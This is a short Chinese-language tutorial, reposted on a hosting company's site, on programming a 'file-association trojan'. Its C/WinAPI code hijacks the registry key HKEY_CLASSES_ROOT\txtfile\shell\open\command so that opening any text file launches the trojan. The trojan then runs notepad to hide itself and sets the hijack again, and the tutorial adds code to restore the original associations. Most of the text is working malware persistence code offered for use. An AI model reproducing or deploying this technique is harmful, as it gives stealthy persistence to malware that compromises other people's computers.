文件关联型木马的编程思路

在执行原有程序之前必须把注册表恢复，否则用ShellExecute还是执行我们的木马程序。

ShellExecute(NULL,"open","notepad.exe",temp,NULL,SW_SHOW);//执行原有的程序
}
//在程序执行完成后，再把注册表改为我们要启动的木马程序的
TCHAR str2[256];
// 得到程序全路径名
GetModuleFileName( NULL, str2, 255 );
strcat(str2," \"%1\" %*");
::RegSetValue(HKEY_CLASSES_ROOT,"txtfile\\shell\\open\\command",
REG_SZ,(LPCTSTR)str2 , strlen(str2) + 1);

//经过上述过程只要程序一运行就会执行我们的start 程序了。

当然了这些程序在自己的机器上运行后还是要恢复的下面的函数就可以帮助进行恢复了

char str2[]="NOTEPAD.EXE %1";
::RegSetValue(HKEY_CLASSES_ROOT,"txtfile\\shell\\open\\command",
REG_SZ,(LPCTSTR)str2 , strlen(str2) + 1);
char str1[]="\"%1\" %*";
::RegSetValue(HKEY_CLASSES_ROOT,"exefile\\shell\\open\\command",
REG_SZ,(LPCTSTR)str1 , strlen(str1) + 1);

当然了这个程序在win98下运行比较正常，在win2000下无法打开桌面上的文件夹，再也就没什么问题了。

凌众科技专业提供服务器租用、服务器托管、企业邮局、虚拟主机等服务，公司网站：http://www.lingzhong.cn 为了给广大客户了解更多的技术信息，本技术文章收集来源于网络,凌众科技尊重文章作者的版权，如果有涉及你的版权有必要删除你的文章，请和我们联系。以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息，谢谢!